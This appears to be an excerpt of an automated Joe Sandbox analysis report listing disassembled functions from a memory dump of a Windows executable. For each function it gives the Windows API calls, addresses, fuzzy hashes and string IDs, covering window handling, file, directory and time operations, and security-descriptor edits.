                          • Instruction ID: 2bdba640aa2ce85ed9475a981bfc790e981900120c5157fc32e665a8f14dc4cb
                          • Opcode Fuzzy Hash: 36ca81ec0bd1979f69d1ffc4241cdc1e182b57a91160cc26f69f321af25696d7
                          • Instruction Fuzzy Hash: 15317C31A44209AADA24EB50DD53EFE7BE4AF20744F3005E6F561B10E5FFA1AF04C655
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000063), ref: 00B3F8AB
                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B3F8BD
                          • SetWindowTextW.USER32(?,?), ref: 00B3F8D4
                          • GetDlgItem.USER32(?,000003EA), ref: 00B3F8E9
                          • SetWindowTextW.USER32(00000000,?), ref: 00B3F8EF
                          • GetDlgItem.USER32(?,000003E9), ref: 00B3F8FF
                          • SetWindowTextW.USER32(00000000,?), ref: 00B3F905
                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B3F926
                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B3F940
                          • GetWindowRect.USER32(?,?), ref: 00B3F949
                          • SetWindowTextW.USER32(?,?), ref: 00B3F9B4
                          • GetDesktopWindow.USER32 ref: 00B3F9BA
                          • GetWindowRect.USER32(00000000), ref: 00B3F9C1
                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B3FA0D
                          • GetClientRect.USER32(?,?), ref: 00B3FA1A
                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B3FA3F
                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B3FA6A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                          • String ID:
                          • API String ID: 3869813825-0
                          • Opcode ID: dba881ee4f254ff0a0d286f32e17f0a4fc25ed30ea85bbd4689dfdec8fb8f0e3
                          • Instruction ID: b585b787a0add89e9a1c9504a24fbf9d4c1a081c6873151eb20482bdbce38b74
                          • Opcode Fuzzy Hash: dba881ee4f254ff0a0d286f32e17f0a4fc25ed30ea85bbd4689dfdec8fb8f0e3
                          • Instruction Fuzzy Hash: 5F51287190070AEFDB209FA8CD89F6EBBF5FF04704F104A69E596A35A0DB74A944CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6CC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B6CD0B
                          • DestroyWindow.USER32(00000000,?), ref: 00B6CD83
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B6CE04
                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B6CE26
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6CE35
                          • DestroyWindow.USER32(?), ref: 00B6CE52
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B00000,00000000), ref: 00B6CE85
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B6CEA4
                          • GetDesktopWindow.USER32 ref: 00B6CEB9
                          • GetWindowRect.USER32(00000000), ref: 00B6CEC0
                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B6CED2
                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B6CEEA
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                          • String ID: 0$tooltips_class32
                          • API String ID: 1297703922-3619404913
                          • Opcode ID: 0e1bd181380e9ac02233dc836c8cb77c9ced84ecd4fad8955cc25eed25670617
                          • Instruction ID: 67f6cfffad9f3d63ac069cc4f634481c332d6858bd57d7d696c65ee28217d1d9
                          • Opcode Fuzzy Hash: 0e1bd181380e9ac02233dc836c8cb77c9ced84ecd4fad8955cc25eed25670617
                          • Instruction Fuzzy Hash: EB71A8B1144309AFE720CF68CC85FBA7BF5EB89704F440959F989A72A1DB75E801CB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4B428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000000), ref: 00B4B46D
                          • VariantCopy.OLEAUT32(?,?), ref: 00B4B476
                          • VariantClear.OLEAUT32(?), ref: 00B4B482
                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B4B561
                          • __swprintf.LIBCMT ref: 00B4B591
                          • VarR8FromDec.OLEAUT32(?,?), ref: 00B4B5BD
                          • VariantInit.OLEAUT32(?), ref: 00B4B63F
                          • SysFreeString.OLEAUT32(00000016), ref: 00B4B6D1
                          • VariantClear.OLEAUT32(?), ref: 00B4B727
                          • VariantClear.OLEAUT32(?), ref: 00B4B736
                          • VariantInit.OLEAUT32(00000000), ref: 00B4B772
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                          • API String ID: 3730832054-3931177956
                          • Opcode ID: 6b52aa7adaa4cf2418ee267fe1441d5b6f8395013207e92985ef1bec7ec9abe9
                          • Instruction ID: 348c1a441c90509c8d604adde8581a589b1ff3cecc14a8e58432c43537e501d3
                          • Opcode Fuzzy Hash: 6b52aa7adaa4cf2418ee267fe1441d5b6f8395013207e92985ef1bec7ec9abe9
                          • Instruction Fuzzy Hash: 3CC1DF31A00615EBCB109F65D8C5F6AB7F5FF05300F1484E5E6059B6A2CB74EE50EBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6E305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B6E3BB
                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00B69615,?), ref: 00B6E417
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6E457
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6E49C
                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B6E4D3
                          • FreeLibrary.KERNEL32(?,00000004,?,?,?,00B69615,?), ref: 00B6E4DF
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B6E4EF
                          • DestroyCursor.USER32(?), ref: 00B6E4FE
                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B6E51B
                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B6E527
                            • Part of subcall function 00B21BC7: __wcsicmp_l.LIBCMT ref: 00B21C50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                          • String ID: .dll$.exe$.icl
                          • API String ID: 3907162815-1154884017
                          • Opcode ID: 94a00a970e6b569c1e2d4de111325c54942a783746bde63370df1e112591f270
                          • Instruction ID: e3827936d2a6f70e21f3417f0ad17398d154a660a30d9142560ba30108d6965b
                          • Opcode Fuzzy Hash: 94a00a970e6b569c1e2d4de111325c54942a783746bde63370df1e112591f270
                          • Instruction Fuzzy Hash: 95618D71500215BAEB249B64DC86BAE7BE8EB18710F104696F925EB1D1DB78D980C760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B50E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00B50EFF
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50F0F
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B50F1B
                          • __wsplitpath.LIBCMT ref: 00B50F79
                          • _wcscat.LIBCMT ref: 00B50F91
                          • _wcscat.LIBCMT ref: 00B50FA3
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B50FB8
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50FCC
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50FFE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B5101F
                          • _wcscpy.LIBCMT ref: 00B5102B
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B5106A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                          • String ID: *.*
                          • API String ID: 3566783562-438819550
                          • Opcode ID: aaf16479bd5a6818aff731183756f1f33f7db36ddb9110f96c1fa25f2e546d96
                          • Instruction ID: b2f76cd7642eba7e4ada28e4767e3a0166909abd20acbe22457a9d7155e93321
                          • Opcode Fuzzy Hash: aaf16479bd5a6818aff731183756f1f33f7db36ddb9110f96c1fa25f2e546d96
                          • Instruction Fuzzy Hash: A3616E725043459FC710EF64C845A9FB7E8FF89310F04899AF98997291EB31EA49CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • CharLowerBuffW.USER32(?,?), ref: 00B4DB26
                          • GetDriveTypeW.KERNEL32 ref: 00B4DB73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4DBBB
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4DBF2
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4DC20
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 2698844021-4113822522
                          • Opcode ID: e1b965f6fe30f44dfc7c4c1e94115b68c16b20d433d618580a14a43f9fcf3cd5
                          • Instruction ID: e74d7996cefb66770e6a86046dba06f347c9bace6dd938d8825447086f936387
                          • Opcode Fuzzy Hash: e1b965f6fe30f44dfc7c4c1e94115b68c16b20d433d618580a14a43f9fcf3cd5
                          • Instruction Fuzzy Hash: 22516C71504305AFC700EF10C8919AAB7E9FF98B58F5088ACF896972A1DB71EE05CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B43110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00B74085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00B43145
                          • LoadStringW.USER32(00000000,?,00B74085,00000016), ref: 00B4314E
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00B74085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00B43170
                          • LoadStringW.USER32(00000000,?,00B74085,00000016), ref: 00B43173
                          • __swprintf.LIBCMT ref: 00B431B3
                          • __swprintf.LIBCMT ref: 00B431C5
                          • _wprintf.LIBCMT ref: 00B4326C
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B43283
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 984253442-2268648507
                          • Opcode ID: 8fd254277a952b189b18d74127f741a3b60ec6045bf8085c997e084e9393975a
                          • Instruction ID: 5a11aa82feb38af3906852b902e5b50306045a56ea5796bfb10386a82a417c3c
                          • Opcode Fuzzy Hash: 8fd254277a952b189b18d74127f741a3b60ec6045bf8085c997e084e9393975a
                          • Instruction Fuzzy Hash: 40411171900219BADB14FB90DD96EEFBBF8AF14B01F1404A5B206B20E1DE656F04DA61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00B4D96C
                          • __swprintf.LIBCMT ref: 00B4D98E
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B4D9CB
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B4D9F0
                          • _memset.LIBCMT ref: 00B4DA0F
                          • _wcsncpy.LIBCMT ref: 00B4DA4B
                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00B4DA80
                          • CloseHandle.KERNEL32(00000000), ref: 00B4DA8B
                          • RemoveDirectoryW.KERNEL32(?), ref: 00B4DA94
                          • CloseHandle.KERNEL32(00000000), ref: 00B4DA9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                          • String ID: :$\$\??\%s
                          • API String ID: 2733774712-3457252023
                          • Opcode ID: 300b7541768c29aea10774402ec43d022265501a3f4a62089f2eae3a9cab8a78
                          • Instruction ID: ab699327803ad4cad3ca740e4d9859bf54bae4b17df259351757412e075fe61c
                          • Opcode Fuzzy Hash: 300b7541768c29aea10774402ec43d022265501a3f4a62089f2eae3a9cab8a78
                          • Instruction Fuzzy Hash: D5319671500218AADB20EFA4DC89FDA77FCEF84710F1085E6F519D21A0EB709B41DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3957D Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                          • String ID:
                          • API String ID: 884005220-0
                          • Opcode ID: 80eb4aa0b448bc772b1dca84f801e13b970c245e918537b8b493455612432563
                          • Instruction ID: b4d5b68fc96b3ecd33540ea4fecc941af449af67365aa68fa89a31f1658a09a9
                          • Opcode Fuzzy Hash: 80eb4aa0b448bc772b1dca84f801e13b970c245e918537b8b493455612432563
                          • Instruction Fuzzy Hash: 9161F372916211EFEB25AF38EC42B6977E4EF05321F3401A5F805EB2D1DBB5DD408AA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B50B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                          Download Yara Rule
                          APIs
                          • __wsplitpath.LIBCMT ref: 00B50C93
                          • _wcscat.LIBCMT ref: 00B50CAB
                          • _wcscat.LIBCMT ref: 00B50CBD
                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B50CD2
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50CE6
                          • GetFileAttributesW.KERNEL32(?), ref: 00B50CFE
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B50D18
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B50D2A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                          • String ID: *.*
                          • API String ID: 34673085-438819550
                          • Opcode ID: 6f30cc101568fdc3ac1a82002d35465434f1bac36dcd7d3f6cbe483f40db29aa
                          • Instruction ID: 4e3946780434b56f3c9af72631c6df5522c104a7fd9c3a87325cb3fb0cf11932
                          • Opcode Fuzzy Hash: 6f30cc101568fdc3ac1a82002d35465434f1bac36dcd7d3f6cbe483f40db29aa
                          • Instruction Fuzzy Hash: 2A8193715143059FC764EF64C884BAEB7E4EB89311F1489EAFC85C7251EB34E988CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B3B903
                            • Part of subcall function 00B3B8E7: GetLastError.KERNEL32(?,00B3B3CB,?,?,?), ref: 00B3B90D
                            • Part of subcall function 00B3B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00B3B3CB,?,?,?), ref: 00B3B91C
                            • Part of subcall function 00B3B8E7: RtlAllocateHeap.NTDLL(00000000,?,00B3B3CB), ref: 00B3B923
                            • Part of subcall function 00B3B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B3B93A
                            • Part of subcall function 00B3B982: GetProcessHeap.KERNEL32(00000008,00B3B3E1,00000000,00000000,?,00B3B3E1,?), ref: 00B3B98E
                            • Part of subcall function 00B3B982: RtlAllocateHeap.NTDLL(00000000,?,00B3B3E1), ref: 00B3B995
                            • Part of subcall function 00B3B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B3B3E1,?), ref: 00B3B9A6
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B3B5F7
                          • _memset.LIBCMT ref: 00B3B60C
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B3B62B
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B63C
                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B3B679
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B3B695
                          • GetLengthSid.ADVAPI32(?), ref: 00B3B6B2
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B3B6C1
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B3B6C8
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B3B6E9
                          • CopySid.ADVAPI32(00000000), ref: 00B3B6F0
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B3B721
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B3B747
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B3B75B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
